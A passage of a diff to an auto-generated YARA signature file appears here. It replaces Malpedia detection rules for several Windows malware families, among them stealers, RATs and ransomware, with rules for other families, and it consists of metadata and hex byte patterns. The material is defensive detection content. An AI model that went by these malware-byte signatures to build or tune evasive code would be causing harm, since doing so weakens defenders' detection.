+		$sequence_0 = { 6a00 ffd7 8b4508 8b7df0 }
+		$sequence_1 = { 895dec 895df8 895df0 e8???????? 8b0d???????? }
+		$sequence_2 = { 894dac 81f900c00000 0f862a020000 b809000000 81f900000100 0f860f010000 }
+		$sequence_3 = { 8b07 83c014 50 8d45f4 }
+		$sequence_4 = { 66c745f86500 e8???????? c9 c3 55 }
+		$sequence_5 = { 8b4e14 3bd1 7602 8bca 394d08 7339 8b4d08 }
+		$sequence_6 = { 742a 3bc2 7426 895028 395120 }
+		$sequence_7 = { ff75f4 6801000080 ffd0 85c0 }
+		$sequence_8 = { 8bec 83ec10 8b0b 8b4508 8365f800 2bc1 83e804 }
+		$sequence_9 = { 83ec48 6a04 8d45fc 50 8d45e8 50 8d45b8 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Acridrain_Auto : FILE
+rule MALPEDIA_Win_Nevada_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fcb90d8e-aad2-5dfa-b2aa-c88c9fb392e4"
+		id = "0fb24068-87ce-54a0-ba82-bfdd95f811de"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acridrain_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nevada"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nevada_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "445c602d5a9107fcce82aaaf7b300d7763f0b08be8d23fd5ad6910688300093b"
+		logic_hash = "e8b202252b082c203b7b36b32325aea4ef97f49142f8ff76e8fa7afc9a175f74"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92495,32 +92860,32 @@ rule MALPEDIA_Win_Acridrain_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff37 e8???????? 83c40c 8945e4 85c0 7421 6a30 }
-		$sequence_1 = { e9???????? 8b8538d2ffff 8b8d3cd2ffff 8bbd4cd2ffff 8b9594d2ffff 898590d2ffff 8b8550d2ffff }
-		$sequence_2 = { c744881000000000 eb32 8b16 807a4100 752a 8b4708 8d0c80 }
-		$sequence_3 = { be???????? e8???????? 83c408 85c0 0f84a6000000 5f 5e }
-		$sequence_4 = { ff7514 51 e8???????? 83c418 33c0 5f 8be5 }
-		$sequence_5 = { ff30 8b442420 0534030000 50 e8???????? 83c408 8bd8 }
-		$sequence_6 = { 7fc5 8b4510 8b4d08 99 034514 5f 135518 }
-		$sequence_7 = { 8d4705 8b7c2428 03f8 897c2428 13ee ff15???????? 8d44241c }
-		$sequence_8 = { ff7504 55 e8???????? 83c40c 85c0 742b 8b4704 }
-		$sequence_9 = { 8bf8 ff15???????? 83c410 85ff 0f84bb000000 8bc7 5f }
+		$sequence_0 = { e9???????? 90 4881c4b8000000 5b 5f 5e 5d }
+		$sequence_1 = { e8???????? 4c8bad10060000 4c3bad08060000 751d c6852206000000 488d8d00060000 4c89ea }
+		$sequence_2 = { 7413 488b4c3320 4801d2 41b802000000 e8???????? 488b8cfb18020000 4885c9 }
+		$sequence_3 = { 488d9d70060000 4c8db5e0040000 4c8da508050000 662e0f1f840000000000 90 4c896c2438 4c897c2430 }
+		$sequence_4 = { 4c89ee 48f7d6 4801c6 6689b722030000 4a8d0c6d00000000 4c01e9 4889ca }
+		$sequence_5 = { 4c8bac2490000000 4b8d0c2e 4883c1ff 4839d1 0f8362020000 4d8d46ff 4c8b942488000000 }
+		$sequence_6 = { 75dc 0fb744244e 6685c0 74e2 6683f82e 75cc 66837c245000 }
+		$sequence_7 = { 660febea f30f7f6e58 660fdbcb 660fdfd8 660febd9 f30f7f5e68 4889f0 }
+		$sequence_8 = { 4889c1 e8???????? 4885c0 0f846a0a0000 4889c1 e8???????? 4889c3 }
+		$sequence_9 = { 84db 780a 4983c101 31c0 89de }
 
 	condition:
-		7 of them and filesize < 2244608
+		7 of them and filesize < 1063936
 }
-rule MALPEDIA_Win_Ati_Agent_Auto : FILE
+rule MALPEDIA_Win_Icefog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "63f89f4a-1d36-5323-b29e-727f0aaf8a03"
+		id = "0a48d625-5699-565a-9775-5f80c9e1ec87"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ati_agent_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icefog_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7c411e9ca433461f4c960c7a6933d449b1b0c508c2b59dbdab9cb50ad78bd018"
+		logic_hash = "487424ea94183e95a7a3963011eba4b3e92a928a4a25ab7f953a01dda9030416"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92534,32 +92899,32 @@ rule MALPEDIA_Win_Ati_Agent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8d87000000 488d3d37af0000 ba58000000 488bcd e8???????? 4885c0 7468 }
-		$sequence_1 = { 488bc8 ff15???????? 488d1548a20000 488bce }
-		$sequence_2 = { 88441420 0fb6d1 4883fa13 72e8 488d542420 }
-		$sequence_3 = { 80f90a 0f94c0 8944244c 488d052ec20000 4a8b14e0 41837c175000 }
-		$sequence_4 = { c3 83f914 7d0d 0fba72180f 83c110 e9???????? }
-		$sequence_5 = { 4053 4883ec20 488bd9 488d0da07b0000 483bd9 }
-		$sequence_6 = { 488d05247f0000 483bd8 7732 488bd3 }
-		$sequence_7 = { 7409 8bc8 e8???????? ebc9 488bcb 488bc3 488d156ba30000 }
-		$sequence_8 = { 0fb6040a 342e 6633c1 48ffc1 664123c0 }
-		$sequence_9 = { 488d05247f0000 483bd8 7732 488bd3 48b8abaaaaaaaaaaaa2a }
+		$sequence_0 = { 68???????? 56 52 e8???????? 83c414 e9???????? 33c0 }
+		$sequence_1 = { 50 8b82a8000000 6a00 51 50 e8???????? 8b45fc }
+		$sequence_2 = { ba00060000 660bc2 6689431c 8b45fc 5f 894314 894324 }
+		$sequence_3 = { 8b460c 8bda 99 03c8 8b4614 13da 99 }
+		$sequence_4 = { e9???????? 8a4602 83c602 84c0 7416 8d642400 3c2a }
+		$sequence_5 = { 8b4304 6a01 50 897df4 e8???????? 8b03 83c414 }
+		$sequence_6 = { e8???????? 83c40c 5d c3 b8???????? c3 a1???????? }
+		$sequence_7 = { e8???????? 83c40c 8bf8 eb03 8b5df0 8b45fc 85c0 }
+		$sequence_8 = { 51 e8???????? 53 8bf0 8995b0feffff e8???????? 8bc8 }
+		$sequence_9 = { 50 68???????? 56 e8???????? 8bd8 83c420 85db }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 1187840
 }
-rule MALPEDIA_Win_Mindware_Auto : FILE
+rule MALPEDIA_Win_Pillowmint_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "47e4869b-800b-5557-a4d9-867ae32fc71e"
+		id = "c0d8452f-d73d-5e3b-840b-1f0850b1a270"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mindware_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pillowmint_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "cdf7a7da50c91df9825bab58a751a2b3b443f392a26a7c4ddad4a0902a0837ae"
+		logic_hash = "ae66a0e7e95b7c87f1f3ab1ab6c5145cf23dd8e31b81c9730156e18b839d9281"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92573,32 +92938,32 @@ rule MALPEDIA_Win_Mindware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 750a 6a64 ff15???????? ebe3 8be5 }
-		$sequence_1 = { 33d1 8b4dec c1e908 0fb6c9 c1e208 0fb689c0b74400 }
-		$sequence_2 = { c78594f2ffff44e44300 c78598f2ffff4ce44300 c7859cf2ffff54e44300 c785a0f2ffff64e44300 }
-		$sequence_3 = { c78578ffffff00001000 c7857cffffff00000000 eb12 8b55d0 899578ffffff 8b45d4 89857cffffff }
-		$sequence_4 = { c78550f4ffffb4e84300 c78554f4ffffbce84300 c78558f4ffffc4e84300 c7855cf4ffffcce84300 c78560f4ffffd4e84300 c78564f4ffffdce84300 c78568f4ffffe4e84300 }
-		$sequence_5 = { 8955d4 8955d8 8b4508 83c02c 50 ff15???????? }
-		$sequence_6 = { c1e104 034c2414 8b01 8907 8b4104 }
-		$sequence_7 = { 895824 0fb689f0d84400 894d10 0fb6ca 0fb689f0d84400 c1e108 314d10 }
-		$sequence_8 = { 8bf2 03f9 c1ce0d 03b8e83f4400 03bc05ccfeffff 037df4 }
-		$sequence_9 = { 8945fc c745f001000000 837dfc00 7541 c745ec00000000 c745f800000000 8b4d08 }
+		$sequence_0 = { e8???????? 488bd8 488bc8 e8???????? c743203f000000 488d4b28 488d1568f20100 }
+		$sequence_1 = { 48c745af00000000 c6459f00 4c8bc3 488d4d9f e8???????? 48837df710 }
+		$sequence_2 = { 483305???????? 488bcb 488905???????? ff15???????? 488d1575970100 483305???????? 488bcb }
+		$sequence_3 = { 488bcb ff15???????? 488d8dc0020000 ff15???????? 80bd8002000000 7415 488d8d80020000 }
+		$sequence_4 = { 6666660f1f840000000000 48ffce 410fb606 88840c80000000 ffc3 48ffc1 4d8d7601 }
+		$sequence_5 = { 7547 448435???????? 753e 498b17 488d0dce5a0200 e8???????? 488b15???????? }
+		$sequence_6 = { 488b9d98000000 488b03 488bcb ff5008 488bc8 e8???????? 488b03 }
+		$sequence_7 = { 488b80b0000000 c605????????00 6666660f1f840000000000 33d2 48ffcb 48f7f5 80fa0a }
+		$sequence_8 = { 4c8d1d3d900100 418bca 99 2bc2 d1f8 }
+		$sequence_9 = { 488b0d???????? 488bc3 48894908 488b0d???????? 488909 488b0d???????? 48894910 }
 
 	condition:
-		7 of them and filesize < 661504
+		7 of them and filesize < 4667392
 }
-rule MALPEDIA_Win_Strelastealer_Auto : FILE
+rule MALPEDIA_Win_Hikit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f02f870-18a6-5958-8b48-817eb9eee346"
+		id = "3cdc5f2c-e59e-5de2-a448-8a8d65bcfa6a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.strelastealer_auto.yar#L1-L179"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hikit_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "90e62167509dc36976a411c59d204669c9f40c335a7d35fe2d5657e279efa4d6"
+		logic_hash = "0bc449cc629b4fb561ad191213636c79bd60e251037b5d8cd78af6bf7f1045a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92612,40 +92977,34 @@ rule MALPEDIA_Win_Strelastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4053 4883ec20 488d058bf80000 488bda 4a8b04c0 483902 7416 }
-		$sequence_1 = { 51 8d94246c010000 52 8d842478020000 }
-		$sequence_2 = { e9???????? e8???????? 488d1d8a4f0100 41b804010000 488bd3 33c9 }
-		$sequence_3 = { 6a0d 8bf8 e8???????? 8b0d???????? 8bf0 890e 8b15???????? }
-		$sequence_4 = { 4883c118 41b801010000 e8???????? 33d2 488d7b0c 0fb7c2 4c8d0d56150100 }
-		$sequence_5 = { 8bf0 57 4e ffd3 33c9 }
-		$sequence_6 = { 488b6c2438 488bc3 488b5c2430 488b742448 4883c420 5f }
-		$sequence_7 = { ffd5 85c0 7566 8b4c2428 89442440 89442444 89442434 }
-		$sequence_8 = { 4889442438 4c8d4c2470 488d8500060000 c785400a000000040000 4889442430 4c8d45a0 488d4588 }
-		$sequence_9 = { 8b0a e8???????? 90 488d1da24f0100 }
-		$sequence_10 = { 8d842470030000 50 8d8c247c040000 51 8d942470020000 52 68???????? }
-		$sequence_11 = { 68???????? ff15???????? 6a0d 8bf8 }
-		$sequence_12 = { 4c8b5577 488d05e1dc0000 0f1000 4c8bd9 488d4c2430 0f104810 0f1101 }
-		$sequence_13 = { ff15???????? ff15???????? 3db7000000 740a e8???????? }
-		$sequence_14 = { 85c0 0f842f020000 6804010000 8d8c247c030000 6a00 51 e8???????? }
-		$sequence_15 = { 33d2 488d8de0030000 41b804010000 e8???????? 33d2 488d8dc0010000 41b804010000 }
+		$sequence_0 = { 8d542414 52 895c2418 e8???????? 83c404 3bc3 741a }
+		$sequence_1 = { 0fbe84c188e30110 6a07 c1f804 59 8985a4fbffff 3bc1 }
+		$sequence_2 = { 895dfc 89450c ffd7 3bc3 7407 8b4d0c }
+		$sequence_3 = { 8bf0 85f6 7505 5e 5f 5d 59 }
+		$sequence_4 = { 48 8b4c2420 48 8b4910 ff90d0020000 48 }
+		$sequence_5 = { 4c 8b4c2478 4c 8b442470 4d 8b4018 48 }
+		$sequence_6 = { 817c241018031120 751d 8b442414 83e801 750a 8d4c2410 51 }
+		$sequence_7 = { 8d4c2420 ff15???????? 89442438 837c243800 7405 e9???????? 48 }
+		$sequence_8 = { 56 ff15???????? b001 eb08 ff15???????? 32c0 5f }
+		$sequence_9 = { e9???????? 48 8b842468010000 0fb600 240f 0fb6c0 c1e002 }
 
 	condition:
-		7 of them and filesize < 266240
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Pay2Key_Auto : FILE
+rule MALPEDIA_Win_Lorenz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2fcc621-8979-5801-a21d-ea66a00d4417"
+		id = "f6bc353c-58c5-5213-8fe7-6cfcca7b0b8a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pay2key_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lorenz_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c5c5a0569f9a48f47100e890ff1d1fd3e4fd615600ef7e4d45ae1b0c294b9a08"
-		score = 75
-		quality = 75
+		logic_hash = "1368912ce9218bae6e0caed5bc87ab7c2ec45745a55c8f3691e41777e1860427"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -92657,32 +93016,32 @@ rule MALPEDIA_Win_Pay2Key_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 84db 74cc 8ac3 8b4df4 64890d00000000 59 }
-		$sequence_1 = { a1???????? 33c5 50 8d45f4 64a300000000 8965f0 0f1f8000000000 }
-		$sequence_2 = { c745fc00000000 8b4610 85c0 7420 a801 7515 83e0fe }
-		$sequence_3 = { 8bbde0000000 85ff 741f 8bc3 f00fc14704 7516 8b07 }
-		$sequence_4 = { 83c102 84d2 75d8 33c0 }
-		$sequence_5 = { 8b7a08 8bc7 8b5a0c 0bc3 7512 3bca 0f94c0 }
-		$sequence_6 = { 8b4f10 894508 85c9 742f 8908 f6c101 }
-		$sequence_7 = { 50 8d45f4 64a300000000 8b410c 83c10c 6a00 ff5028 }
-		$sequence_8 = { 6a02 50 e8???????? 8b4de4 83c410 3bc1 7716 }
-		$sequence_9 = { d1e8 03c2 3bc1 0f43c8 894df8 8d048d04000000 50 }
+		$sequence_0 = { 8b4dfc 8b55fc 8b8100050000 2b8204050000 83f801 7515 b904000000 }
+		$sequence_1 = { 8b4df0 83c110 e9???????? 8b4df0 83c160 e9???????? 8d4de0 }
+		$sequence_2 = { 8bc8 e8???????? 0fb6c0 85c0 743b 8d4dd4 e8???????? }
+		$sequence_3 = { 8b55fc 898a20080000 8b45fc c7802c08000000000000 8b4dfc c7813008000000000000 8b55fc }
+		$sequence_4 = { f00fb10a 3d00000080 0f8588000000 8b45f0 83c01c 50 6a04 }
+		$sequence_5 = { c7402000000000 8b4d0c e8???????? 8b4dfc 894124 8b4d0c e8???????? }
+		$sequence_6 = { eb05 e8???????? e9???????? 837d14ff 0f84ac000000 8b45ec 83781400 }
+		$sequence_7 = { cc 33c0 75d0 33c9 75cc 837df820 7f0e }
+		$sequence_8 = { 8b4d08 51 e8???????? 83c410 8b55f0 83ca01 8955f0 }
+		$sequence_9 = { 8bec 83ec08 894df8 837d0800 7414 8b4508 833800 }
 
 	condition:
-		7 of them and filesize < 2252800
+		7 of them and filesize < 2254848
 }
-rule MALPEDIA_Win_Industrial_Spy_Auto : FILE
+rule MALPEDIA_Win_Hamweq_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7da79c63-fa14-572c-88ac-b76f6cdc6221"
+		id = "472b9f91-ae73-5b23-84d5-48c0a12f0ce8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.industrial_spy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hamweq_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "7a3233469624bdad85e090a4dc1c96ea6796ab995a15b629b5d495e015c5b4df"
+		logic_hash = "97fb94f14abe15a4280f753f2ae96a2750195cd748cddbf78c3df32e07994a82"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92696,114 +93055,71 @@ rule MALPEDIA_Win_Industrial_Spy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4881ec50020000 8b9c2480020000 498bf1 488bf9 448bcb }
-		$sequence_1 = { 48896c2410 4889742418 57 4883ec20 8b742450 488d7904 89b790010000 }
-		$sequence_2 = { 8bc5 448bc3 2bc3 488d5718 4803d0 498bce e8???????? }
-		$sequence_3 = { b80f000000 412bc1 41ffc1 8bd0 0fb64c05e7 0fb6441804 4403c0 }
-		$sequence_4 = { 488d1576800000 e8???????? 8bcb 4885c0 740c }
-		$sequence_5 = { e8???????? 85c0 7461 488d942468020000 488bcf e8???????? }
-		$sequence_6 = { e8???????? 4885c0 754c 488d942428020000 488bcf e8???????? 4885c0 }
-		$sequence_7 = { 4885c0 7509 488d056f710100 eb04 4883c024 4883c428 c3 }
-		$sequence_8 = { 8b742450 488d7904 89b790010000 4c8d9780010000 410fb601 498be8 c1e018 }
-		$sequence_9 = { 448bd2 418bc3 23c2 41f7d2 0bc8 034dc8 }
+		$sequence_0 = { 6800000040 50 ff5118 8945f4 }
+		$sequence_1 = { 740d 3c32 7409 c745fc01000000 eb33 8d45e0 8b0e }
+		$sequence_2 = { 8b06 ff7140 8d8de0fdffff 51 ff5048 }
+		$sequence_3 = { 0f8484030000 837de000 0f847a030000 85c0 0f8472030000 }
+		$sequence_4 = { ffb150010000 8d8de8fdffff 51 ff5048 }
+		$sequence_5 = { 50 8d85ecfeffff 50 895dfc ff5154 8b06 8d8decfeffff }
+		$sequence_6 = { 8d4580 8b0b 50 ff5154 }
+		$sequence_7 = { 8b06 753c ffb1d8000000 8d8d00feffff 51 }
+		$sequence_8 = { 889decfeffff ffb178010000 8d8decfeffff 51 }
+		$sequence_9 = { ff75f8 ffd6 ff35???????? 898534ffffff ff75f8 ffd6 ff35???????? }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 24576
 }
-rule MALPEDIA_Win_Konni_Auto : FILE
+rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b496c86d-77c9-50ca-bd29-c6ba6090731f"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.konni_auto.yar#L1-L487"
+		id = "96a12e80-b15f-580e-920d-d6c0d35464b0"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mykings_spreader_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4a537b4460e51cec9389cef999baf5dfc7c64c03085bd38519060ea921833d74"
+		logic_hash = "1bcd674173fea4b83a2f4219e8f61306a972490f94a89cfaf5e1f466fdec8eff"
 		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 0fb609 0fb6d2 03ca 81e1ff000080 }
-		$sequence_1 = { 83f801 7508 66c745f50000 eb09 83f802 7504 }
-		$sequence_2 = { 0fbef1 83e601 8970f0 d0f9 0fbef1 }
-		$sequence_3 = { c745e0f4010000 890d???????? 8815???????? ff15???????? 85c0 7552 }
-		$sequence_4 = { 83c410 85c0 0f850fffffff 6a3d 68???????? 53 }
-		$sequence_5 = { 8970fc d0f9 0fbef1 83e601 8970f8 }
-		$sequence_6 = { 81e6ff000080 7908 4e 81ce00ffffff 46 8a9c35f8feffff }
-		$sequence_7 = { 49 81c900ffffff 41 8a940df8feffff 8d8c0df8feffff 0fb6da 03f3 }
-		$sequence_8 = { 83f804 740f c705????????02000000 83f801 750a c705????????01000000 890d???????? }
-		$sequence_9 = { 6a01 ff15???????? 50 a3???????? }
-		$sequence_10 = { 33c9 83f802 7508 890d???????? eb1e 83f804 }
-		$sequence_11 = { 68b6030000 6a0d 50 ff15???????? }
-		$sequence_12 = { 8d4801 eb02 33c9 e8???????? 8bf8 }
-		$sequence_13 = { 8d85eafbffff 33d2 57 50 668995e8fbffff e8???????? 6a40 }
-		$sequence_14 = { 51 e8???????? 83c408 be???????? 85c0 7513 }
-		$sequence_15 = { 8bd9 33ff 8d8df2fdffff 33c0 57 51 668985f0fdffff }
-		$sequence_16 = { 745d 8d95f0fdffff 52 6804010000 ff15???????? }
-		$sequence_17 = { 8b35???????? ffd6 8b85d0fbffff 50 ffd6 57 ffd6 }
-		$sequence_18 = { 0f1f840000000000 0fb601 4883c104 48ffca 0fb60418 8841fc 75ed }
-		$sequence_19 = { 81eb00200200 83bd9404000000 899d94040000 0f85d7030000 8d85a0040000 }
-		$sequence_20 = { 8916 56 e8???????? 8a8c30dec44600 }
-		$sequence_21 = { 41b850000000 4533c9 488bd3 488bc8 c744242803000000 }
-		$sequence_22 = { 8d85f0fcffff 50 68???????? ff15???????? 85c0 741c 6a00 }
-		$sequence_23 = { 52 6a00 6a00 ff15???????? 68d0070000 ff15???????? }
-		$sequence_24 = { 488bcd c744242880000000 4c89642450 4889442458 4889442460 c744242003000000 ff15???????? }
-		$sequence_25 = { 4c89742420 ff15???????? 488bd8 4885c0 744f }
-		$sequence_26 = { 33d2 56 e8???????? 8a9435dec44600 5e 84c0 8bfa }
-		$sequence_27 = { 6804010000 8d95f8feffff 52 50 ff15???????? 8d85f8feffff 50 }
-		$sequence_28 = { 49ffc0 49ffc9 75d5 0fb645bd }
-		$sequence_29 = { 4c895df7 4c895dff 4c895d07 c745bb67e6096a 8d7808 488945af }
-		$sequence_30 = { ffd6 68???????? 8d8df8feffff 51 ffd6 }
-		$sequence_31 = { e8???????? 8a8c30dec44600 5e bb01000000 }
-		$sequence_32 = { 83e203 83f908 7229 f3a5 ff2495f0444000 8bc7 ba03000000 }
-		$sequence_33 = { 4c8b5da8 4533c9 420fb6440db8 49ffc2 }
-		$sequence_34 = { 8d95f8feffff 52 ffd6 6804010000 }
-		$sequence_35 = { 00644440 0023 d18a0688078a 46 }
-		$sequence_36 = { 33db 56 e8???????? 8a9c30c2c44600 5e }
-		$sequence_37 = { 59 0bc9 89851a040000 61 7508 }
-		$sequence_38 = { 5d bbedffffff 03dd 81eb00200200 83bd9404000000 }
-		$sequence_39 = { 33c9 56 e8???????? 8a8c30a6c44600 5e }
-		$sequence_40 = { ff15???????? 8d95f8feffff 52 ff15???????? 8b3d???????? be0a000000 }
-		$sequence_41 = { c3 8b442404 c7405030880010 c7401401000000 c3 }
-		$sequence_42 = { 59 3bc7 59 a3???????? 741e 68???????? 68???????? }
-		$sequence_43 = { 42888401d0fa0100 ffc7 ebde 488b05???????? f0ff08 }
-		$sequence_44 = { f2ae 488d442440 33d2 48f7d1 894c2428 }
-		$sequence_45 = { 56 e8???????? 80a0c798001000 80b8????????5c 59 }
-		$sequence_46 = { 4c8d05c7650100 488d15d8060100 488d4c2420 e8???????? }
-		$sequence_47 = { 8a4c303a 413ac8 741d 85db 7419 880a 4b8b84f9a02e0200 }
-		$sequence_48 = { 83e00f eb02 33c0 0fbe84c608710010 }
-		$sequence_49 = { 742e 85f6 7419 0fb6da f683a1a2001004 7406 8816 }
-		$sequence_50 = { 0f85a3010000 8b7510 53 817e0402010000 0f850f010000 66833d????????01 }
-		$sequence_51 = { 80794000 0f857e010000 48897c2450 4183f901 753b 48895108 }
-		$sequence_52 = { 41f7d1 488d3d99550100 4983f808 0f82ec000000 48895c2410 498bd8 }
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 7519 51 55 8bce e8???????? 6a00 6a00 }
+		$sequence_1 = { 8b1e ff938c000000 8b0424 8b5014 85d2 7507 bf00000000 }
+		$sequence_2 = { e8???????? 837e1800 7439 8b4620 c1e003 89c7 8b4618 }
+		$sequence_3 = { 89c1 c745f401000000 3b4df4 723d ff4df4 8d7600 ff45f4 }
+		$sequence_4 = { 68???????? 50 ff15???????? a3???????? 83c0fe 40 40 }
+		$sequence_5 = { 8942fc 89d8 c1f81f 8b1424 8b7208 8b4a0c 29de }
+		$sequence_6 = { eb02 b300 e8???????? 8d45cc e8???????? c745cc00000000 58 }
+		$sequence_7 = { 33d2 b9???????? 8bc2 8bf2 c1f805 83e61f 8b0485a02e4100 }
+		$sequence_8 = { 89d8 29f0 85c0 7e39 8b55f4 85d2 7505 }
+		$sequence_9 = { 8b7508 8b36 8975c8 8b7d08 8b7f04 }
 
 	condition:
-		7 of them and filesize < 2361344
+		7 of them and filesize < 1581056
 }
-rule MALPEDIA_Win_Runningrat_Auto : FILE
+rule MALPEDIA_Win_Dratzarus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "297d1859-ca3a-5430-a307-3e48917944b6"
+		id = "9c3af3dd-4032-5af8-b2c4-ec6909e4538c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.runningrat_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dratzarus_auto.yar#L1-L123"
 		license_url = "N/A"
